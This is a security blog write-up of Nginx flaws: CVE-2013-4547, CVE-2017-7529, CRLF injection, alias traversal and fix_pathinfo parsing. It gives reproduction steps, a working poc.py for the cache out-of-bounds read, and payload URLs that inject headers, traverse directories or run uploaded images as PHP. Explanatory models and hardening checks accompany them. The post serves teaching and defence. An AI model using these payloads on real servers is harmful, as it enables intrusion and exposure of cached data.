Nginx middleware vulnerabilities

Nginx Parsing Vulnerability (CVE-2013-4547)

  • Affects Version: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7
  • Vulnerability analysis
    With pathinfo off by default, only files with the .php extension are sent to fastcgi for parsing.
    CVE-2013-4547 arises because the illegal characters space (0x20) and NUL (\0) confuse the finite-state machine Nginx uses to parse the URI; the impact is that an attacker can bypass the extension restriction with an unencoded space. When we request 1.gif[0x20][0x00].php, Nginx takes the suffix of 1.gif[0x20] to be .php and hands 1.gif[0x20] over to PHP for parsing, producing a parsing vulnerability.
  • Vulnerability reproduction

    Upload a normal picture; its link can be accessed and the picture is displayed normally.
    Upload a normal picture whose suffix has [0x20] appended. Visiting 192.168.232.128:8080/uploadfiles/1.jpg returns a 404 (the file without the trailing space does not exist; the 404 page is Nginx's). Visiting 192.168.232.128:8080/uploadfiles/1.jpg[0x20] prompts a download of the picture; the picture is not parsed.

    Write phpinfo() into 2.jpg and upload it the same way, with a space after the suffix.

    Then access 2.jpg[0x20][0x00].php:
    in Burp, edit the hex so that the two bytes after the suffix are 20 and 00; the 20 is the space and the 00 is the NUL byte that truncates the file name.

    The file is found to have been parsed as PHP.
    A Linux file name can end with a space; on Windows a file name cannot end with a space, so when Windows sees the file name "test.jpg " it automatically removes the trailing space, which is equivalent to accessing "test.jpg". For this reason the vulnerability is very easy to exploit on Windows.
    Reference links
    https://blog.werner.wiki/file-resolution-vulnerability-nginx/
    http://www.91ri.org/9064.html
    https://vulhub.org/#/environments/nginx/CVE-2013-4547/
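Added example (not code from the original post, from vulhub or from Nginx): a small Python model of the mechanism described above. It assumes a document root of /var/www/html and a typical `location ~ \.php$` block that forwards matching URIs to PHP-FPM. It builds the raw request Burp sends after the hex edit, shows that the URI still matches the PHP location while the path PHP actually receives is cut at the NUL byte, reproduces the Windows trailing-space behaviour, and ends with the check that security.limit_extensions enforces.

```python
import re

# Assumptions for this model (not from the original page): the document root and a
# typical 'location ~ \.php$' block that forwards matching URIs to PHP-FPM.
DOCROOT = b"/var/www/html"
PHP_LOCATION = re.compile(rb"\.php$")


def raw_request(host, path):
    """Build the request Burp sends after the hex edit.

    path is bytes, so 0x20 and 0x00 go on the wire literally; an HTTP library or a
    browser would percent-encode them (%20, %00) and the trick would not work.
    """
    return (b"GET " + path + b" HTTP/1.1\r\n"
            + b"Host: " + host + b"\r\n"
            + b"Connection: close\r\n\r\n")


def nginx_dispatch(uri):
    """Model of the affected dispatch: the regex location is matched against the
    whole URI (which does end in .php) and SCRIPT_FILENAME is docroot + uri.
    Returns None when the URI is not routed to PHP at all."""
    if PHP_LOCATION.search(uri) is None:
        return None
    return DOCROOT + uri


def php_script_path(script_filename):
    """PHP-FPM consumes SCRIPT_FILENAME as a C string, so everything from the first
    NUL byte onwards is dropped: '2.jpg \\0.php' becomes '2.jpg '."""
    return script_filename.split(b"\x00", 1)[0]


def windows_filename(name):
    """Windows cannot store a name that ends in spaces and strips them, so the
    uploaded '2.jpg ' is simply '2.jpg' there, which is why exploitation is easy."""
    return name.rstrip(b" ")


def is_safe_script(script_filename):
    """Hardening check: refuse any path containing NUL or whitespace, and only run
    scripts whose real name (after C-string truncation) ends in .php. This is the
    effect of security.limit_extensions = .php in php-fpm."""
    if b"\x00" in script_filename or re.search(rb"\s", script_filename):
        return False
    return php_script_path(script_filename).endswith(b".php")
```

The interesting output is the pair `nginx_dispatch(...)` / `php_script_path(...)`: Nginx routes on a URI that ends in `.php`, PHP executes a file that ends in `.jpg `.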

Nginx Cache Out-of-Bounds Read Vulnerability (CVE-2017-7529)

  • Affects Version: Nginx 0.5.6 - 1.13.2
  • Vulnerability analysis
    When Nginx reverse-proxies a site it usually caches some files, especially static files. The cache is stored in files on disk, and each cache file consists of "file header" + "HTTP response headers" + "HTTP response body". If a later request hits that cache file, Nginx returns the "HTTP response body" from the file directly to the user.

    If my request carries a Range header, Nginx returns content of the requested length according to the start and end positions I specify. If I construct two negative positions, such as (-600, -9223372036854774591), data at a negative position may be read. If that request also hits a cache file, the "file header", "HTTP response headers" and other content located before the "HTTP response body" in the cache file can be read.
  • Vulnerability reproduction

    As can be seen, the out-of-bounds read returns the "file header", "HTTP response headers" and other content located before the "HTTP response body".
    If the read looks wrong, adjust the offset (605) in poc.py.
    Contents of poc.py
#!/usr/bin/env python
# poc.py (vulhub CVE-2017-7529): request two suffix byte ranges whose summed
# length overflows a signed 64-bit counter, so Nginx reads from a negative
# offset of the cache file and returns the bytes stored before the cached body.
import sys
import requests

if len(sys.argv) < 2:
    print("%s url" % (sys.argv[0]))
    print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
    sys.exit()

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605   # bytes to read before the cached body; tune if the output looks wrong
url = sys.argv[1]
# First request: learn the body length (and make sure the response is cached).
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
# "-n" starts n bytes before the end, i.e. `offset` bytes before the body;
# the second suffix range makes the summed size wrap to exactly 2^63.
headers['Range'] = "bytes=-%d,-%d" % (
    n, 0x8000000000000000 - n)

r = requests.get(url, headers=headers)
print(r.text)
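Added example (not from the original post, vulhub or the Nginx source): a Python model of the suffix-range arithmetic that makes poc.py work, so the offset and the second huge range can be understood offline. The vulnerable branch follows the behaviour described above (start = content_length - N in plain 64-bit arithmetic, with the only guard being a check of the summed size against the body length); the `fixed=True` branch is an assumption shaped like the upstream fix (clamp the suffix start to 0 and reject a range before the running total can exceed the body), not quoted Nginx code.

```python
# Added model of the suffix-range arithmetic behind CVE-2017-7529 (not nginx's code).
INT64_MIN = -(2 ** 63)


def wrap_int64(v):
    """Emulate C signed 64-bit (off_t) overflow by wrapping into [-2^63, 2^63-1]."""
    return (v - INT64_MIN) % (2 ** 64) + INT64_MIN


def build_poc_range(body_len, offset=605):
    """The same header poc.py sends: bytes=-n,-(2^63-n) with n = body_len + offset."""
    n = body_len + offset
    return "bytes=-%d,-%d" % (n, 0x8000000000000000 - n)


def parse_suffix_ranges(header, content_length, fixed=False):
    """Model of how the range filter turns suffix ranges ('-N') into (start, end).

    fixed=False: affected logic, start = content_length - N with off_t arithmetic,
    and the only guard is 'size > content_length' after all ranges are summed.
    fixed=True: assumed hardened logic, start clamped to 0 when N >= content_length
    and each range rejected before the running total could exceed content_length.
    Returns (ranges, size) or None when the request is rejected.
    """
    if not header.startswith("bytes="):
        raise ValueError("unsupported Range unit")
    ranges, size = [], 0
    for spec in header[len("bytes="):].split(","):
        spec = spec.strip()
        if not spec.startswith("-"):
            raise ValueError("only suffix ranges are modelled here")
        suffix_len = int(spec[1:])
        end = content_length - 1
        if fixed:
            start = content_length - suffix_len if suffix_len < content_length else 0
            if end - start + 1 > content_length - size:
                return None            # total would exceed the body: reject
            size += end - start + 1
        else:
            start = wrap_int64(content_length - suffix_len)   # may go negative
            size = wrap_int64(size + end - start + 1)         # may wrap around
        ranges.append((start, end))
    if size > content_length:
        return None                    # the guard that the wrap-around defeats
    return ranges, size


def bytes_before_body(ranges):
    """How far before the cached body the first range reaches (0 if in bounds)."""
    return max(0, -ranges[0][0])
```

With a 1000-byte body the first range starts at -605 (the 605 bytes before the body: cache file header plus stored response headers), the second range brings the summed size to exactly 2^63, which wraps to a negative number and so passes the size check; the hardened branch rejects the same request.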

Reference articles
https://vulhub.org/#/environments/nginx/CVE-2017-7529/
https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Range_requests

Vulnerabilities caused by Nginx misconfiguration

CRLF injection vulnerability

  • Vulnerability analysis
    When a redirect is configured in nginx using $uri or $document_uri, the problem is that $uri and $document_uri hold the request path after decoding, so passing %0a%0d introduces line breaks into the response header and causes a CRLF injection vulnerability.
  • Vulnerability reproduction
    Visit http://your-ip:8080/%0a%0dSet-Cookie:%20a=1 and capture the response with Burp: the Set-Cookie header has been injected successfully.
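Added example (not code from the original post or from Nginx): a Python model of why `$uri` is dangerous in a redirect and `$request_uri` is not. The two directives being compared, `return 302 https://$host$uri;` (vulnerable) and `return 302 https://$host$request_uri;` (fixed), the host name and the CR-LF order `%0d%0a` used in the payload are assumptions of this example.

```python
from urllib.parse import unquote

# Constructed example; the two directives being compared are assumptions:
#   vulnerable: return 302 https://$host$uri;
#   fixed:      return 302 https://$host$request_uri;


def nginx_uri(request_uri):
    """$uri (and $document_uri): the request path after percent-decoding, without
    the query string. $request_uri, by contrast, is the raw path the client sent."""
    return unquote(request_uri.split("?", 1)[0])


def redirect_location(request_uri, host, use_request_uri=False):
    """Value of the Location header produced by the two return directives."""
    target = request_uri if use_request_uri else nginx_uri(request_uri)
    return "https://" + host + target


def response_head(location):
    """Serialize the 302 response head; an injected CR LF inside location ends the
    Location line and starts a new header line."""
    return "HTTP/1.1 302 Moved Temporarily\r\nLocation: " + location + "\r\n\r\n"


def parse_headers(head):
    """Parse the head the way a client does: split on CR LF, first line is status."""
    headers = {}
    for line in head.split("\r\n")[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def has_crlf(value):
    """Guard to apply to anything that is reflected into a response header."""
    return "\r" in value or "\n" in value
```

With `$uri` the decoded `\r\n` splits the Location line and the client sees a `Set-Cookie: a=1` header; with `$request_uri` the percent-encoded bytes are passed through untouched and no new header appears.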

Directory traversal vulnerability

  • Vulnerability analysis
    When configuring an alias in Nginx, forgetting the trailing / creates a directory traversal vulnerability.
    Example of the wrong configuration (the intent was to let users access files under /home/):
location /files {
    alias /home/;
}

When we visit /files../, the path nginx actually handles is /home/../, which traverses out of the directory.

  • Vulnerability reproduction
    Visit http://your-ip:port/files../
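Added example (not code from the original post or from Nginx): a Python model of the prefix replacement that `alias` performs, run against the misconfigured `location /files` and the corrected `location /files/`, plus a detection rule applied to a few constructed access-log lines. The log lines and the target path /etc/passwd are constructed for this example.

```python
import posixpath
import re


def alias_resolve(location_prefix, alias_target, uri):
    """Model of how nginx maps a URI through 'location <prefix> { alias <target>; }':
    if the URI starts with the prefix, the prefix is replaced by the target and the
    rest of the URI is appended verbatim. Returns None when the location does not match.
    """
    if not uri.startswith(location_prefix):
        return None
    return alias_target + uri[len(location_prefix):]


def escapes(path, root):
    """True when the normalized filesystem path lies outside root."""
    root = root.rstrip("/")
    norm = posixpath.normpath(path)
    return norm != root and not norm.startswith(root + "/")


def is_traversal_attempt(uri, location_prefix):
    """Detection rule: a URI that matches the prefix but continues with something
    other than '/' (e.g. '/files../') is a probe for the missing-slash alias bug."""
    if not uri.startswith(location_prefix):
        return False
    rest = uri[len(location_prefix):]
    return rest != "" and not rest.startswith("/")


# Constructed access-log lines in combined format (not from a real server).
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /files/report.txt HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /files../ HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /files../etc/passwd HTTP/1.1" 200 1430
"""


def flagged_requests(log_text, location_prefix):
    """Return the request paths in the log that match the traversal rule."""
    flagged = []
    for line in log_text.splitlines():
        m = re.search(r'"[A-Z]+ (\S+) HTTP/', line)
        if m and is_traversal_attempt(m.group(1), location_prefix):
            flagged.append(m.group(1))
    return flagged
```

The fix is the trailing slash on the location: with `location /files/ { alias /home/; }` the request `/files../` no longer matches the location at all, so nothing is appended to `/home/`.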

Parsing vulnerability

  • Vulnerability analysis
    If nginx.conf is configured to hand files with the .php suffix to fastcgi, and the requested .php file does not exist while php.ini has cgi.fix_pathinfo=1 (if the current path does not exist, fall back to the parent path), then fastcgi ends up processing the file one level above the .php.
  • Vulnerability reproduction
    Visit a picture containing phpinfo, http://192.168.232.128/uploadfiles/nginx.png: it is not parsed.

    Append /.php to the file name in the URL, e.g. http://192.168.232.128/uploadfiles/nginx.png/.php: it is now parsed as a PHP file.

  • Fix
    Set cgi.fix_pathinfo to 0, and set security.limit_extensions in php-fpm.conf to .php
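Added example (not code from the original post or from PHP): a Python model of the path walk that cgi.fix_pathinfo=1 performs on SCRIPT_FILENAME, next to the two fixes above (cgi.fix_pathinfo=0 and security.limit_extensions=.php). The document root /var/www/html and the fake file set are constructed for this example.

```python
# Constructed fake filesystem: the uploaded picture exists, 'nginx.png/.php' does not.
FAKE_FS = {"/var/www/html/uploadfiles/nginx.png", "/var/www/html/index.php"}


def fix_pathinfo(script_filename, exists, fix=1):
    """Model of PHP's cgi.fix_pathinfo handling of SCRIPT_FILENAME.

    With cgi.fix_pathinfo=1 PHP walks up the path until it finds an existing file
    and treats the stripped tail as PATH_INFO; with 0 the path must exist exactly
    as given. Returns (script, path_info) or None when no script is found.
    """
    if exists(script_filename):
        return script_filename, ""
    if not fix:
        return None
    path = script_filename
    while path.count("/") > 1:
        path = path.rsplit("/", 1)[0]
        if exists(path):
            return path, script_filename[len(path):]
    return None


def limit_extensions_ok(script, allowed=(".php",)):
    """php-fpm's security.limit_extensions: only execute scripts with one of these
    suffixes. An empty setting means no restriction."""
    if not allowed:
        return True
    return script.endswith(tuple(allowed))


def php_fpm_execute(script_filename, exists, fix=1, allowed=(".php",)):
    """Combine both settings: which file (if any) PHP-FPM would actually run."""
    resolved = fix_pathinfo(script_filename, exists, fix)
    if resolved is None:
        return None
    script, _ = resolved
    return script if limit_extensions_ok(script, allowed) else None
```

Either fix alone stops the case on this page: with `fix=0` the non-existent `nginx.png/.php` is rejected before any walk, and with `.php` in the allowed list the walked-up `nginx.png` is refused even when the walk happens.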

Reference article: https://www.cnblogs.com/yuzly/p/11208742.html

Origin www.cnblogs.com/g0udan/p/12399170.html